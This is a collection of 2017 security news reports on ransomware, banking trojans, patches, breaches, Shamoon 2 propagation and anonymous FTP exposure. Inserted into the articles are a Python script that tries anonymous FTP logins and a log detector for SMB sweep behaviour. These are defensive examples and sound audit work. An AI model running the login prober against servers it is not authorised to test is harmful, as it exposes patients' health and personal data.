David Martínez, one of the researchers who discovered the malware (alongside Kafeine, MalwareHunterTeam and BroadAnalysis), found a file called user.txt in the installer and discovered that a string in it is sent to the C&C with every request. According to Abrams, this suggests that PyCL is part of a Ransomware as a Service (RaaS) operation, where the username is the affiliate identifier.

The ransomware was first observed checking if it has administrative privileges and deleting the shadow volume copies on the computer if it does. Next, the malware sends the victim’s Windows version to the C&C, along with details such as administrative privileges, screen resolution, processor architecture, computer name, username, and the MAC address of the primary network adapter.

PyCL uses a unique AES-256 encryption key for each file, saves the list of files and their decryption keys to a randomly named file in the CL folder, and encrypts that file with an RSA-2048 public key.

While most ransomware families replace users' files with their encrypted counterparts, this piece of malware leaves the original files on the hard disk, meaning that users don't have to pay the ransom to get them back (this, however, might change in future versions of the malware). Finally, PyCL displays a lock screen that contains a 4-day timer, a Bitcoin address, and the ransom amount.


Škodlivé reklamy na zahraničních porno webech kradou údaje k bankovnictví

28.3.2017 Novinky/Bezpečnost Kriminalita
Trojský kůň Ramnit se šíří prostřednictvím reklamního systému, který načítá reklamní bannery v novém okně prohlížeče. Přesměruje oběť na server útočníka, z něhož stáhne škodlivý program.
Ramnit is spreading through several of the largest porn sites in the United Kingdom and Canada. It is a so-called exploit kit that is downloaded to the infected device and allows remote administration of the compromised computer.

Specifically, Ramnit targets login credentials for online banking and also for FTP servers. In the past this Trojan horse caused a great deal of damage, but then all but disappeared. It began reappearing in 2015, and last August attackers used it in an attack on the six largest banks in the United Kingdom.

Clicking a photo or video thumbnail was enough
“After about eight months of no activity, security analysts came across two new servers through which the attackers remotely control devices infected by Ramnit,” IBM security expert Limor Kessem explained on SecurityIntelligence.com.

“The attackers then launched a malicious campaign in the United Kingdom and are distributing new configurations of the Trojan, supplemented with other kinds of malware, whose goal is to obtain users' login credentials for online banking,” Kessem added.

Specifically, on the most popular porn sites in the United Kingdom and Canada, the virus spreads when the user clicks an image thumbnail in a chosen gallery or video category, which also triggers a pop-up window with a malicious advertisement.

Through it, the Ramnit Trojan horse is downloaded to the device and then carries out hidden activities on the compromised computer. In this campaign the attackers abused the ExoClick advertising network, which took steps to stop the malicious advertiser immediately after the campaign was uncovered.

Czechs should be careful too
Banking malware is also attacking in the Czech Republic. It is not the Ramnit mentioned above, but the Trojan horse Android\Trojan.Spy.Banker.HV, which targets mobile devices running the Android operating system.

The malware spreads through fake SMS messages.
“It spreads via fraudulent SMS messages. According to current information, the attackers have so far targeted only ČSOB. It can be expected, however, that the range of targeted banks will soon expand,” warns Lukáš Štefanko, malware analyst at ESET. The malware spreads through fake SMS messages that pretend to be communication from Česká pošta or the Alza.cz store.

The fake message prompts the user to open the online banking website. Instead, however, it slips in a fake login page. An inattentive user thus unknowingly sends their login credentials to the fraudsters and is exposed to the threat of having their account emptied. During February this year, fake SMS messages with a link to a supposed DHL application spread in this way in the Czech Republic and Slovakia.

Protection against similar attacks is fairly simple. “To limit the risks, I recommend following two basic security measures in particular. First of all, do not let yourself be induced to install applications via links that may lead to a fraudulent page. The application the user wants to install should always be looked up in the official app store or on trusted sites,” explains Lukáš Štefanko of ESET.


Which applications pose the biggest security problem on PCs

28.3.2017 Novinky/Bezpečnost Security
Flash, Java, or WinZip. These are applications used on computers by the vast majority of users. Precisely because of their popularity, however, computer pirates very often target them as well. And that is a problem, because users very often underestimate updating these applications. Unknowingly, they thus open a back door into their computer for cybercriminals.
The fact that users very often underestimate updates of the most widely used programs is the subject of an analysis by antivirus company Avast. According to it, more than half (52%) of the most widespread computer applications, including Flash and Java, are out of date on users' computers.

“In the online world, security habits such as regularly updating software play an important role in personal safety on the Internet. Experienced hackers know exactly how to target weaknesses, and by using outdated programs people make the attack easier for them,” said Avast CTO Ondřej Vlček.

Updates are often postponed
According to him, users often postpone updates and then forget about them despite reminders. In some cases they may perform the update incorrectly, and as a result the program no longer updates, for example if they do not leave the “update automatically” option checked during reinstallation.

The ranking of the most outdated applications is topped by the aforementioned Java. It is a platform used by the web and some applications, and versions 6 and 7 are used by more than 24 million users. “While another 26 million users have the latest version, Java 8, more than 70% of them have not yet installed the last released update,” Vlček noted.

Second place went to Flash Player, currently one of the most popular programs for playing videos on the Internet. “99% of users should update it for Internet Explorer,” Vlček said.

Flash Player is used by several hundred million people worldwide. Precisely because of its great popularity, cyber raiders target Flash Player regularly. According to an analysis by security company Recorded Future, eight of the ten most widespread threats in 2015 targeted this video player.

Handing their computer over to pirates
The not very flattering bronze medal goes to the Foxit Reader application, where 92% of users work with an outdated version.

Yet bugs in these applications are very often among the critical ones. In other words, in the extreme case an attacker could even take control of the compromised system through such a hole. They could then easily get to stored data or intercept login credentials for various web services.

Such a machine can then, even without the user's knowledge, become part of a botnet (a network of enslaved computers), which cybercriminals usually abuse to send spam or for DDoS attacks. If users do not install updates in time, they expose their machine to computer pirates.

“Conversely, among the most up-to-date applications were Google Chrome at 88%, Opera at 84%, and Skype at 76%. The percentages show that even applications with automatic updates are not always up to date,” Vlček concluded.

Least updated programs
1. Java (Runtime 6, 7), Oracle Corporation
2. Flash Player (Active X), Adobe Systems
3. Foxit Reader, Foxit Software
4. GOM Media Player, Gretech
5. Nitro Pro, Nitro Software
6. WinZip, Corel Corporation
7. DivX, DivX LLC
8. Adobe Shockwave Player, Adobe Systems
9. 7-ZIP, Igor Pavlov
10. Firefox, Mozilla
Source: Avast


Apple Patches Hundreds of Vulnerabilities Across Product Lines

28.3.2017 securityweek Apple

Apple Patches Desktop, Mobile, Wearable Platforms to Fix More than 200 Security Vulnerabilities

Apple on Monday released security patches for its macOS and macOS Server, iOS, watchOS, tvOS, Safari, and Pages, to address over 200 vulnerabilities.

No less than 127 vulnerabilities were addressed with the release of macOS Sierra 10.12.4 (and Security Update 2017-001 El Capitan and Security Update 2017-001 Yosemite). These affected components such as apache, Audio, Bluetooth, FontParser, ImageIO, IOFireWireAVC, Kernel, OpenSSH, OpenSSL, QuickTime, Security, tcpdump, tiffutil, and WebKit.

tcpdump was affected the most, as the tech giant resolved 41 vulnerabilities in this component alone. By leveraging these flaws, an attacker in a privileged network position may be able to execute arbitrary code with user assistance, Apple notes in its advisory. The company also resolved 11 bugs in Kernel and 8 flaws in tiffutil.

Some of the flaws resolved in macOS Sierra 10.12.4 include memory corruption, inconsistent user interface issues, out-of-bound read, access and validation issues, buffer overflow, uncontrolled format string, timing side channel bug, profile uninstallation issue, use after free, and race condition. Many were addressed by improved input validation or improved memory handling.

Tracked as CVE-2017-2485 and discovered by Cisco Talos, a memory corruption issue was found in the parsing of certificates and was addressed through improved input validation. According to Apple, the issue could lead to arbitrary code execution when processing a maliciously crafted x509 certificate. Talos reveals that this use-after-free vulnerability (which affects iOS as well) manifests due to improper handling of X.509v3 certificate extensions fields.

“An application that passes a malicious certificate to the certificate validation agent could trigger this vulnerability. Possible scenarios where this could be exploited include users connecting to a website which serves a malicious certificate to the client, Mail.app connecting to a mail server that provides a malicious certificate, or opening a malicious certificate file to import into the keychain,” the researchers say.

The macOS Sierra 10.12.4 update also includes the security content of Safari 10.1, Apple says. In a separate advisory, the company explains that 38 bugs were squashed in the browser, 33 of which affect WebKit (three were found in WebKit JavaScript Bindings and WebKit Web Inspector). The security update addresses memory corruption, prototype access, keychain handling, information disclosure, and validation issues.

iOS 10.3 was released on Monday with fixes for 84 flaws affecting Accounts, Audio, CoreGraphics, CoreText, FontParser, ImageIO, Kernel, libarchive, Profiles, Safari, Security, and WebKit, among other components (many of the fixed issues were impacting macOS, Safari).

Some of the addressed flaws include a buffer overflow in the handling of font files, an infinite recursion, multiple memory corruption issues, out-of-bounds read bugs, or the sending of requests to iTunes sandbox web services in cleartext. Affecting how Safari handles JavaScript pop-ups, one of the flaws was abused by attackers to lock victims from using the browser and scare them into paying a ransom in the form of an iTunes Gift Card.

Also released on Monday, tvOS 10.2 addresses 56 bugs, while watchOS 3.2 resolves 34 of them. Additionally, Apple pushed out macOS Server 5.3 to resolve 3 vulnerabilities (in Profile Manager, Web Server, and Wiki Server), and Pages 6.1, Numbers 4.1, and Keynote 7.1 for Mac and Pages 3.1, Numbers 3.1, and Keynote 3.1 for iOS, to address one issue in Export.


1.4 Billion Records Compromised in 2016: Report

28.3.2017 securityweek Crime

Nearly 1.4 billion records were compromised in 2016 as a result of roughly 1,800 data breaches, according to Gemalto’s latest Breach Level Index report.

The company said the number of compromised records increased by 86 percent compared to the previous year. The report also shows that more than 1,000 incidents, or 59 percent of the total, involved theft of identity information, while nearly 30 percent involved financial and account data.

Data collected by Gemalto shows that 68 percent of data breaches were the work of malicious external hackers, while 19 percent of incidents were classified as accidental leaks. Malicious insiders accounted for 9 percent of breaches.

The most serious breaches mentioned in the report affected FriendFinder Networks (412 million records), the Philippines Commission on Elections (77 million records), DailyMotion (85 million records), Fling (40 million records), the Indian state of Kerala (34 million records), and Evony (33 million records).

The Yahoo breaches disclosed last year, which involved hundreds of millions of user records, were not taken into account due to the fact that the incidents occurred in 2013 and 2014. Based on the same logic, the Fling breach should have been excluded as well as it appears to have occurred in 2011.

Furthermore, the report also lists the “17” streaming app with 30 million records, but an analysis of the hackers’ claims showed that the actual number of compromised records was roughly 4 million.

According to Gemalto, the healthcare industry was hit the hardest in terms of the number of incidents, and accounted for more than a quarter of breaches. Other affected sectors are government (15%), retail (12%), financial services (12%), and technology (11%).

When it comes to the number of compromised records, the government and tech sectors take the lead with roughly 391 million records each.

As for the geographical distribution of affected organizations, 80 percent of the breaches catalogued by Gemalto affected the United States.

Gemalto breach level index

The company said more than 7 billion records were lost or stolen since 2013, which means that, on average, more than 4.5 million records are compromised every day. Of all the incidents known to Gemalto, only 4 percent involved efficient encryption that made the exposed data useless.

Risk Based Security reported in January that the total number of records exposed in 2016 was 4.2 billion, but the company also included the Yahoo, MySpace and other incidents that took place in previous years.


Shamoon 2 – Palo Alto Networks sheds lights on the method for network distribution
28.3.2017 securityaffairs Virus

Security researchers at Palo Alto Networks have determined that the Shamoon 2 malware uses a rudimentary technique for network distribution.
Security researchers at Palo Alto Networks continue to analyze the dreaded Shamoon 2 malware and the recent waves of attacks; they have now determined that the threat uses a rudimentary technique for network distribution.

The Shamoon 2 malware was first spotted in November 2016; a second variant of the same threat, able to target virtualization products, was discovered by researchers at Palo Alto Networks in January.

Shamoon, also known as Disttrack, was first discovered in a wave of attacks that targeted companies in Saudi Arabia in 2012. Among the victims, there was the petrol giant Saudi Aramco. The principal capability of Shamoon is a feature that allows it to wipe data from hard drives of the infected systems.

IBM recently reported that the attackers delivered the Shamoon 2 malware using weaponized documents, while Symantec reported that the Magic Hound and Greenbug groups may have helped conduct reconnaissance, including stealing credentials and creating persistent backdoors.

Threat actors used stolen credentials to deliver the malware to the target systems; according to researchers at Symantec, the credentials may have been provided by another cyber espionage group called Greenbug.

Greenbug hackers used the Ismdoor remote access Trojan (RAT) and other tools in attacks against organizations in the Middle East.

Ismdoor establishes a backdoor on the target machine and leverages PowerShell for command and control (C&C).

The group targeted organizations in multiple industries, including aviation, investment, government and education organizations in several countries (i.e. Saudi Arabia, Iran, Iraq, Bahrain, Qatar, Kuwait and Turkey, and a Saudi company in Australia).

Yesterday experts at Palo Alto Networks shared details of their investigation into how the stolen credentials were used by the attackers.

The threat actors first compromised a single system on the network using the Remote Desktop Protocol (RDP) and stolen credentials, then used it as a distribution server. The machine was used to store the hacking tools and the malicious code used in the attack. Then the attackers attempted to connect to named systems on the network using compromised credentials to spread the Shamoon malware.

“Our analysis also shows an actor distributes Disttrack within the targeted network by first compromising a system that is used as the Disttrack distribution server on that network. The actor then uses this server to compromise other systems on the network by using the hostname to copy over and execute the Disttrack malware.” reads the blog post published by Palo Alto Networks. “On each of these named systems that are successfully compromised, the Disttrack malware will attempt to propagate itself to 256 additional IP addresses on the local network. This rudimentary, but effective, distribution system can enable Disttrack to propagate to additional systems from a single, initially compromised system in a semi-automated fashion.”

Shamoon 2

The researchers speculate the hackers obtained the information of the named hosts directly from Active Directory on a domain controller, a circumstance that suggests that the Shamoon 2 attackers used legitimate credentials in their operations.

“This rudimentary, but effective, distribution system can enable Disttrack to propagate to additional systems from a single, initially compromised system in a semi-automated fashion,” researchers said.

The researchers at Palo Alto Networks also explored a possible connection between the Shamoon 2 malware and the Magic Hound campaign. The researchers noticed that one of the command and control (C&C) servers used by Magic Hound and a server hosting the Shamoon files used IP addresses from the same range, namely 45.76.128.x. Both attacks also leveraged PowerShell and Meterpreter and targeted entities within Saudi Arabia.

“If the Magic Hound attacks are indeed related to the Shamoon attack cycle, we may be able to hypothesize that the Magic Hound attacks were used as a beachhead to perform reconnaissance for the adversaries and gather network information and credentials,” continues Palo Alto Networks. “This may be further supported by the initial Magic Hound payloads we discovered, Pupy RAT and Meterpreter, both of which have these types of capabilities.”

In summary, Palo Alto Networks agrees with Symantec's theory that the threat actors behind Shamoon 2 conducted the Magic Hound campaign as the reconnaissance phase of their attacks.


Apple iOS 10.3 Fixes Safari Flaw Used in JavaScript-based Ransomware Campaign
28.3.2017 thehackernews Apple

If you own an iPhone or iPad, it's possible you could see popup windows in a sort of endless cycle on your Safari browser, revealing your browser has been locked and asking you to pay a fee to unlock it. Just do not pay any ransom.
A new ransomware campaign has been found exploiting a flaw in Apple's iOS Safari browser in order to extort money from users who view pornography content on their phones or attempt to illegally download pirated music or other sensitive content.
However, the good news is that Apple patched the web browser vulnerability on Monday with the release of iOS version 10.3.
The vulnerability resides in the way Safari displayed JavaScript pop-up windows, which allowed ransomware scammers to display an endless loop of pop-up windows, preventing victims from using the browser, researchers from mobile security provider Lookout said in a blog post published on Monday.
The victims would eventually end up on an attacker website that masquerades as a legitimate law enforcement site, informing victims that they have to pay a fine for viewing illegal content in order to regain access to their browser.
Lookout researchers called the exploit "scareware," as the attack doesn't actually encrypt any data and hold it to ransom. Rather, the attack just scares victims into paying the ransom fee to unlock the browser.
"The scammers abused the handling of pop-up dialogs in Mobile Safari in such a way that it would lock out a victim from using the browser," Lookout explains.
"The attack would block the use of the Safari browser on iOS until the victim pays the attacker money in the form of an iTunes Gift Card. During the lockout, the attackers displayed threatening messaging in an attempt to scare and coerce victims into paying."
The scammers effectively used fear to get victims to pay the fee before they realized that there was no real risk to their data and that the issue is very easy to overcome.
For users, overcoming the threat is as simple as clearing their browsing history and cache; iOS 10.3 users are no longer at risk of getting trapped in the endless cycle of JavaScript pop-ups at all.
Lookout researchers shared the cause of this iOS exploit with Apple last month, and the company has promptly patched the issue with the release of iOS 10.3. Now, pop-up windows only take over a tab, instead of the entire app.
Those iOS 10.2 users who are already hit by this ransomware campaign can clear their browsing cache by navigating to Settings → Safari → Clear History and Website Data.


Symantec API Flaws reportedly let attackers steal Private SSL Keys and Certificates
28.3.2017 thehackernews Safety
A security researcher has disclosed critical issues in the processes and third-party API used by Symantec certificate resellers to deliver and manage Symantec SSL certificates.
The flaw, discovered by Chris Byrne, an information security consultant and instructor for Cloud Harmonics, could allow an unauthenticated attacker to retrieve other persons' SSL certificates, including public and private keys, as well as to reissue or revoke those certificates.
Even without revoking and reissuing a certificate, attackers can conduct "man-in-the-middle" attacks over secure connections using stolen SSL certs, tricking users into believing they are on a legitimate site when in fact their SSL traffic is being secretly tampered with and intercepted.
"All you had to do was click a link sent in [an] email, and you could retrieve a cert, revoke a cert, and re-issue a cert," Byrne wrote in a Facebook post published over the weekend.
Symantec knew of API Flaws Since 2015
Byrne said he first discovered the issues surrounding Symantec certificates in 2015 and agreed to "limited non-disclosure," as Symantec said the company would take nearly two years to fix the problems.
"Symantec committed to finding and replacing all of the certificates which MAY have been impacted, and then replace them... that they would do so within six months for every cert they could identify, and within two years for every cert period," Byrne said.
The researcher did not disclose any details to the public until last week when Google disclosed its plan to gradually distrust Symantec-issued certificates inside Google Chrome after discovering several issues with the company and four of its third-party cert resellers.
"Given Google's experience and actions here, it appears that Symantec did not fix these issues as they committed to," Byrne said.
However, Byrne was not able to verify that the vulnerabilities he found were exactly the same issues Google engineers disclosed last week.
According to Byrne, the certificate request and delivery API Symantec provides to its third-party resellers accepts URI-based UIDs "without proper authentication, or in some cases, any authentication at all."
Since the API server didn't authenticate users prior to accessing certificate information, any tech-savvy customer could have easily intercepted an email containing the API-generated link, or taken their own UID and modified one of its parameters.
This would eventually have allowed a malicious attacker to access information on other Symantec customers, identify high-value targets, and perform automated attacks.
Gaining Full Control Over Another User's SSL Certificates
Using the same API vulnerabilities, the attacker could have even gained full control over another customer's certificates, which includes obtaining public and private keys, revoking certs, or reissuing certs with new passphrases.
Currently, neither the researcher nor the company has discovered any evidence to prove such a scenario, but the possibility alone was enough for Byrne when considering disclosure.
"It would then be trivial to compromise DNS for a particular organization or person they wanted to attack. At that point, they could pretend to be that person's bank, their credit card company, their employer, anyone," Byrne added.
"Perhaps the worst compromise would be to spoof a patch and update server, for an entire company. Then every single machine at that company could be compromised simultaneously."
According to the researcher, Symantec has since fixed some of the issues, but not all. We have reached out to Symantec, and will update the story as soon as we hear back from the company.
Symantec has not yet responded to Byrne's disclosure, though the company has recently published two blog posts accusing Google of "exaggerated and misleading" claims the search engine company made last month regarding its CAs.


Targeted Attacks on Industrial Sector Increasingly Common: Kaspersky

28.3.2017 securityweek ICS 

Kaspersky Lab’s recently launched ICS-CERT department has published a report detailing the industrial sector threat landscape based on data collected by the company in the second half of 2016.

According to the security firm, its products have blocked attack attempts against more than 39 percent of protected industrial systems running Windows. This includes SCADA systems, data storage servers (i.e. historian), data gateways, engineer and operator workstations, and human-machine interfaces (HMI).

On average, the company detected attacks against roughly 20 percent of industrial computers every month in the second half of 2016. These devices were mainly attacked via the Internet (22%), removable media (11%) and email (8%).


Kaspersky pointed out that while stationary workstations on the operational network (OT) don’t typically have an always-on Internet connection, the devices used by network administrators, developers and contractors can often freely connect to the Internet, and experts believe these machines are the most exposed.

In the case of email attacks, hackers leveraged common topics (e.g. banking, package delivery messages) to send malware hidden in VBS, JavaScript, Word, NSIS, AutoCAD, HTML, Java, BAT, PDF and Excel files.

The most targeted countries, relative to the total number of ICS they host, are Vietnam, Algeria, Morocco, Tunisia, Indonesia, Bangladesh, Kazakhstan, Iran, China, Peru, Chile, India, Egypt, Mexico and Turkey. The United States and Western European countries are far less targeted, according to Kaspersky data.

ICS attacks observed by Kaspersky

Kaspersky warned that targeted attacks aimed at organizations in industrial sectors are increasingly common. These campaigns involve both widely available malware and custom threats, including zero-day exploits.

One of the spear phishing campaigns observed by the security firm targeted more than 500 companies in over 50 countries worldwide. The attack, which is still ongoing, has mainly targeted industrial companies in sectors such as metallurgy, electric power, construction and engineering.

The operation relied on social engineering emails sent from corporate mail servers previously infected with spyware designed to steal account credentials. The delivered malware was common, but the samples had been packed using VB and MSIL packers modified specifically for this attack.

As for non-targeted attacks, Kaspersky identified roughly 20,000 malware variants across more than 2,000 families on industrial systems. While many of these threats are Trojans, researchers also spotted worms, viruses, exploits and ransomware.

“Remarkably, there is very little difference between the rankings of malware detected on industrial computers and those of malware detected on corporate computers. We believe that this demonstrates the absence of significant differences between computers on corporate networks and those on industrial networks in terms of the risk of chance infections. However, it is obvious that even a chance infection on an industrial network can lead to dangerous consequences,” Kaspersky said in its report.

Kaspersky experts have identified a significant number of vulnerabilities in ICS products in the past months. Last year, they reported finding 75 flaws, including 58 rated highly critical. Only 30 of these security holes have been addressed as of March 2017.

Kaspersky Lab will be hosting its annual Security Analyst Summit (SAS) next week in St. Maarten. The company will also be presenting an overview of the industrial sector threat landscape at SecurityWeek's 2017 Singapore ICS Cyber Security Conference next month.


FBI Cyber Division warns the healthcare industry of FTP attacks
28.3.2017 securityaffairs Attack

The Cyber Division of the U.S. Federal Bureau of Investigation (FBI) warns the companies in the healthcare industry of FTP attacks.
The Cyber Division of the U.S. Federal Bureau of Investigation (FBI) warns the healthcare industry that malicious actors are actively targeting File Transfer Protocol (FTP) servers of medical and dental facilities that allow anonymous access.

FTP attacks

The attackers aim to steal protected health information (PHI) and personally identifiable information (PII) and use them for criminal purposes.

“The FBI is aware of criminal actors who are actively targeting File Transfer Protocol (FTP) servers operating in “anonymous” mode and associated with medical and dental facilities to access protected health information (PHI) and personally identifiable information (PII) in order to intimidate, harass, and blackmail business owners.” reads the alert issued by the FBI.

The vulnerable FTP servers can also be abused by crooks to power cyber attacks or to store malicious tools.

“The FBI recommends medical and dental healthcare entities request their respective IT services personnel to check networks for FTP servers running in anonymous mode. If businesses have a legitimate use for operating a FTP server in anonymous mode, administrators should ensure sensitive PHI or PII is not stored on the server.”

According to a 2015 study conducted by the University of Michigan titled, “FTP: The Forgotten Cloud,” over 1 million FTP servers were configured to allow anonymous access. These servers were potentially exposing sensitive data due to the anonymous extension of FTP that allows a user to authenticate to the FTP server with a generic username (i.e. “anonymous”, “ftp”) with no password or using a generic password.

“In general, any misconfigured or unsecured server operating on a business network on which sensitive data is stored or processed exposes the business to data theft and compromise by cyber criminals who can use the data for criminal purposes such as blackmail, identity theft, or financial fraud,” the FBI warned.

In order to prevent FTP attacks, the FBI recommends that medical and dental healthcare entities check their organizations' networks for FTP servers running in anonymous mode.

In case companies need to have an FTP server running in anonymous mode, they should not store sensitive PHI or PII on the server.
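The check the FBI recommends, as an added example that is not part of the alert: a read-only audit that asks each listed server whether it accepts the generic "anonymous" login described in the University of Michigan study, and reports the hosts that do. The hostnames and the FakeFTP class are constructed stand-ins so the logic runs offline; against real servers, pass the default ftplib.FTP factory.

```python
"""Audit FTP servers for anonymous-mode logins (defensive check).

Only a login is attempted: nothing is listed, read or written.
"""
import ftplib

ANON_USER = "anonymous"
ANON_PASS = "audit@example.invalid"   # conventional e-mail-style password


def check_anonymous_ftp(host, port=21, timeout=5.0, ftp_factory=ftplib.FTP):
    """Return "anonymous", "refused" or "unreachable" for one server."""
    ftp = ftp_factory(timeout=timeout)
    try:
        ftp.connect(host, port)
    except ftplib.all_errors:             # includes OSError: refused, timeout
        return "unreachable"
    try:
        ftp.login(ANON_USER, ANON_PASS)
        return "anonymous"                # 230 reply: anonymous mode is on
    except ftplib.error_perm:
        return "refused"                  # 530 reply: anonymous login disabled
    except ftplib.all_errors:
        return "unreachable"
    finally:
        try:
            ftp.quit()
        except ftplib.all_errors:
            pass


def audit_hosts(hosts, ftp_factory=ftplib.FTP):
    """Map every host to its result."""
    return {host: check_anonymous_ftp(host, ftp_factory=ftp_factory)
            for host in hosts}


def anonymous_hosts(results):
    """Hosts that need attention: anonymous mode enabled."""
    return sorted(host for host, state in results.items() if state == "anonymous")


# --- constructed fake network for the offline demonstration ---------------
FAKE_NETWORK = {                          # hypothetical hosts, not real ones
    "files.clinic.example": "anonymous",  # misconfigured: anonymous mode on
    "imaging.clinic.example": "refused",  # anonymous login disabled
    "old-box.clinic.example": "down",     # nothing listening on port 21
}


class FakeFTP:
    """Minimal stand-in for ftplib.FTP driven by FAKE_NETWORK."""

    def __init__(self, timeout=None):
        self.timeout = timeout
        self.host = None

    def connect(self, host, port=21):
        self.host = host
        if FAKE_NETWORK.get(host) == "down":
            raise ConnectionRefusedError(111, "Connection refused")
        return "220 ready"

    def login(self, user="", passwd=""):
        if FAKE_NETWORK.get(self.host) == "anonymous" and user == ANON_USER:
            return "230 Login successful."
        raise ftplib.error_perm("530 Login incorrect.")

    def quit(self):
        return "221 Goodbye."


if __name__ == "__main__":
    results = audit_hosts(list(FAKE_NETWORK), ftp_factory=FakeFTP)
    for host, state in results.items():
        print(f"{host:28} {state}")
    print("anonymous mode enabled on:", anonymous_hosts(results))
```

Run it with `ftp_factory=ftplib.FTP` only against servers you administer; a "refused" result still means the server is reachable and worth reviewing for stored PHI or PII.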


Are you a Docs.com user? Watch out you may have leaked passwords and other precious data
28.3.2017 securityaffairs Crime

Thousands of users of the Microsoft searchable Docs.com service have inadvertently exposed passwords and other private information on the Internet.
Bad news for thousands of users of the Microsoft searchable Docs.com service who have inadvertently exposed passwords and other private information on the Internet.

The Docs.com service allows people to easily exchange documents; it implements a useful search engine that helps users search them for keywords.

“Docs.com is an online showroom where you can collect and publish Word documents, Excel workbooks, PowerPoint and Office Mix presentations, OneNote notebooks, PDF files, Sway stories, and Minecraft worlds. With Docs.com, it’s easy for you to share with others what interests you, and your content looks great on any device.” reads the description provided by Microsoft.

“Anything you publish with Public visibility will appear in worldwide search engine results and can be shared by you and others on social media sites. This option is a great way to get your work noticed. On the other hand, anything you publish with Limited visibility does not appear in search engine results and can be viewed only by people with whom a direct link to your content has been shared. Similarly, anything you publish with Organization visibility does not appear in search engine results and can be viewed only by those who sign in with a school or work account from your school or organization.”

A group of experts decided to analyze the service over the weekend, searching for highly private information. They started by looking at files and documents matching search keys such as “password” and “confidential,” and unfortunately what they discovered is disconcerting.

Kevin Beaumont (@GossiTheDog), 2:24 AM - 25 Mar 2017: “Microsoft have a website called http://docs.com where Office 365 customers can share anything in public. It has a search function.”
Thousands of users are accidentally sharing personal and sensitive data via Docs.com, the experts have found bank account details, password lists, medical records, social security numbers and even a divorce settlement or two.

Docs.com data leak

As you know, this kind of information is a gift for hackers, who could use it for illegal purposes such as financial scams and identity theft.

Evidently, the issue is caused by thousands of people, from Office 365 subscribers to others with Microsoft single-sign-on accounts, labeling sensitive documents as public, which allows Microsoft's search engine to find them.
Following the researchers' disconcerting discovery, Microsoft temporarily shut down the search function and, of course, alerted affected users. Unfortunately, this measure is not sufficient to remove the information accidentally shared on the Internet, because many pages containing sensitive and personal information have already been cached by other web services and remain available to search engines.
“As part of our commitment to protect customers, we’re taking steps to help those who may have inadvertently published documents with sensitive information,” a spokesperson told The Reg. “Customers can review and update their settings by logging into their account at www.docs.com.”

Every time you use a web service, it is essential to check its security and privacy settings to avoid this kind of issue. In this specific case, check whether you or your colleagues have shared information on Docs.com labeled as public.


Shamoon 2 Used Rudimentary Method for Network Distribution

28.3.2017 Securityweek Virus
Palo Alto Networks researchers have continued to analyze the Shamoon 2 attacks and determined that the method used by the malware to spread on the targeted organizations' networks is rudimentary, but efficient.

The latest waves of attacks involving the disk-wiping malware Shamoon, aka Disttrack, have been analyzed by several security firms. IBM reported recently that the attackers delivered Shamoon using weaponized documents, and researchers have found connections to several other Iran-linked threat actors, including Charming Kitten (aka Newscaster, NewsBeef), Rocket Kitten, Magic Hound (aka Timberworm, COBALT GYPSY), and Greenbug.

It has been known that the Shamoon 2 attacks involved stolen credentials and that the threat actors had access to the targeted organizations’ networks well before the malware initiated its destructive routines. Symantec reported that the Magic Hound and Greenbug groups may have helped conduct reconnaissance, including stealing credentials and creating persistent backdoors.

In a blog post published on Monday, Palo Alto Networks said it managed to determine exactly how the stolen credentials were used by the attackers.

According to researchers, the hackers first compromised a single system on the network using the Remote Desktop Protocol (RDP) and stolen credentials. This machine, which became their distribution server, stored the attackers’ tools and malware. From this distribution server, the attackers attempted to connect to named systems on the network using compromised credentials and infect them with the Shamoon malware.

From the named systems, the malware identified up to 256 IP addresses on the local network and spread to those devices. Then, from the newly infected systems, the malware attempted to spread to another 256 IP addresses on the local network.

Experts believe the information on named hosts was obtained directly from Active Directory on a domain controller, which also suggests that the attackers used legitimate credentials in their operations.

“This rudimentary, but effective, distribution system can enable Disttrack to propagate to additional systems from a single, initially compromised system in a semi-automated fashion,” researchers said.
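The fan-out described above (one infected host reaching hundreds of neighbours in its own /24 over SMB) is visible in flow or firewall logs. The following detection is an added example, not Palo Alto Networks' code; the log format, the addresses and the sample traffic are constructed for it:

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Added example, not Palo Alto Networks' code: flag a host that reaches many
# distinct neighbours in its own /24 over SMB within a short window, the
# fan-out the Shamoon 2 distribution stage produces. Log format and the
# sample below are constructed for this example.


def make_sample_log():
    """Constructed flow log: one workstation using a couple of file servers and
    one 'named system' sweeping 10.0.5.1-10.0.5.40 over two minutes."""
    base = datetime(2017, 1, 23, 10, 0, 0)
    lines = []
    for i, dst in enumerate(["10.0.5.40", "10.0.5.41", "10.0.5.40"]):
        ts = base + timedelta(minutes=3 * i)
        lines.append(f"{ts.isoformat()} src=10.0.5.77 dst={dst} dport=445")
    for i in range(1, 41):
        ts = base + timedelta(seconds=3 * i)
        lines.append(f"{ts.isoformat()} src=10.0.5.20 dst=10.0.5.{i} dport=445")
    return lines


def parse_line(line: str):
    """'<iso-timestamp> src=A dst=B dport=N' -> (datetime, src, dst, dport)."""
    ts_text, *kv = line.split()
    fields = dict(tok.split("=", 1) for tok in kv)
    return datetime.fromisoformat(ts_text), fields["src"], fields["dst"], int(fields["dport"])


def same_slash24(a: str, b: str) -> bool:
    """True when both addresses fall in the same /24."""
    def net(ip):
        return ipaddress.ip_network(f"{ip}/24", strict=False)
    return net(a) == net(b)


def detect_fanout(lines, threshold=20, window=timedelta(minutes=10), port=445):
    """Return [(src, distinct_hosts, first_ts, last_ts)] for every source that
    connected to >= threshold distinct same-/24 hosts on `port` inside `window`.
    Shamoon tried up to 256 neighbours; a threshold well below that still
    catches the sweep while sparing ordinary file-server use."""
    per_src = defaultdict(list)
    for ts, src, dst, dport in sorted(parse_line(l) for l in lines if l.strip()):
        if dport == port and src != dst and same_slash24(src, dst):
            per_src[src].append((ts, dst))
    alerts = []
    for src, hits in per_src.items():
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1                 # slide the window forward
            distinct = {dst for _, dst in hits[start:end + 1]}
            if len(distinct) >= threshold:
                alerts.append((src, len(distinct), hits[start][0], hits[end][0]))
                break                      # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for src, n, first, last in detect_fanout(make_sample_log()):
        print(f"{src} reached {n} distinct /24 neighbours on {445} between {first} and {last}")
```

The same sliding window, keyed on RDP (3389) instead of SMB, catches the initial hop from the distribution server to the named systems.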

